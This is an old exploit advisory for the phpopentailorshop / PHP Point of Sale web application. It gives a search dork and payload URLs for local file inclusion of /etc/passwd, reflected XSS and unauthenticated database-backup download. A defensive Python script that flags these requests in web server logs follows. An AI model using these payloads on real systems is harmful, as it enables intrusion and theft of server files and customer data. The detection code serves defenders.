phpopentailorshop Multiple Vulnerabilities



EKU-ID: 215 CVE: OSVDB-ID:
Author: Cyber-security Published: 2011-05-12 Verified: Verified


# Exploit Title: phpopentailorshop Multiple Vulnerabilities
# Author: Cyber-security   
# Software Link: http://www.phppointofsale.com/
# Category: Multiple Vulnerabilities
# d0rk: intext: "Powered by PHP Point of Sale"
# Tested on: Windows XP SP3
________                     ________.__                    __  
\______ \ ________          /  _____/|  |__   ____  _______/  |_
|    |  \\___   /  ______ /   \  ___|  |  \ /  _ \/  ___/\   __\
|    `   \/    /  /_____/ \    \_\  \   Y  (  <_> )___ \  |  | 
/_______  /_____ \          \______  /___|  /\____/____  > |__| 
        \/      \/                 \/     \/           \/       
---LFI---
http://localhost/phpopentailorshop/login.php?cfg_language=../../../../etc/passwd%00
---XSS---
http://localhost/phpopentailorshop/customers/customers_barcode.php?generateWith=<script>alert(0)</script>
---Download Backup Vulnerability---

To start the backup:

http://localhost/phpopentailorshop/backupDB.php?StartBackup=4

Backup URL:

http://localhost/phpopentailorshop/backupDB.php?nohtml=1

File saved to D:\AppServ\www\phpopentailorshop/backups/.db_backup.2011-05-11.sql.gz.

Thanks to: all Algerian hackers
saoucha - indoushika - TheBlind747 - N2N - Kader11000
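
For defenders reviewing web server logs of an affected install, the following added example (not part of the original advisory and not the project's code) flags the three request patterns listed above. The log lines, IP addresses, the benign `cfg_language=english` value and the finding labels are constructed for illustration, and the combined log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (documentation IP ranges), not real traffic.
# "english" is an assumed legitimate cfg_language value.
SAMPLE_LOG = [
    '192.0.2.10 - - [12/May/2011:10:00:01 +0000] "GET /phpopentailorshop/login.php?cfg_language=english HTTP/1.1" 200 2048',
    '198.51.100.7 - - [12/May/2011:10:00:02 +0000] "GET /phpopentailorshop/login.php?cfg_language=../../../../etc/passwd%00 HTTP/1.1" 200 1310',
    '198.51.100.7 - - [12/May/2011:10:00:03 +0000] "GET /phpopentailorshop/customers/customers_barcode.php?generateWith=%3Cscript%3Ealert(0)%3C/script%3E HTTP/1.1" 200 640',
    '198.51.100.7 - - [12/May/2011:10:00:04 +0000] "GET /phpopentailorshop/backupDB.php?StartBackup=4 HTTP/1.1" 200 512',
    '198.51.100.7 - - [12/May/2011:10:00:05 +0000] "GET /phpopentailorshop/backupDB.php?nohtml=1 HTTP/1.1" 200 180',
    '198.51.100.7 - - [12/May/2011:10:00:06 +0000] "GET /phpopentailorshop/backups/.db_backup.2011-05-11.sql.gz HTTP/1.1" 200 90112',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(target):
    """Return the set of findings for one request target (path + query)."""
    parts = urlsplit(target)
    path = parts.path.lower()
    # parse_qs percent-decodes once, so %00 becomes a literal NUL byte here.
    params = parse_qs(parts.query, keep_blank_values=True)
    findings = set()
    if path.endswith("/login.php"):
        # A language name should never contain traversal, separators or NUL.
        for value in params.get("cfg_language", []):
            if ".." in value or "/" in value or "\\" in value or "\x00" in value:
                findings.add("lfi:cfg_language")
    if path.endswith("/customers_barcode.php"):
        for value in params.get("generateWith", []):
            if re.search(r"[<>\"']", value):
                findings.add("xss:generateWith")
    if path.endswith("/backupdb.php") and {"StartBackup", "nohtml"} & params.keys():
        findings.add("backup:trigger")
    if "/backups/" in path:
        findings.add("backup:file-request")
    return findings

def scan(lines):
    """Return (line_number, sorted findings) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        found = classify(match.group(1)) if match else set()
        if found:
            hits.append((number, sorted(found)))
    return hits

if __name__ == "__main__":
    for number, found in scan(SAMPLE_LOG):
        print(number, ", ".join(found))
```

Every `backupDB.php` and `/backups/` hit should be matched against known administrator activity, since legitimate backups produce the same requests.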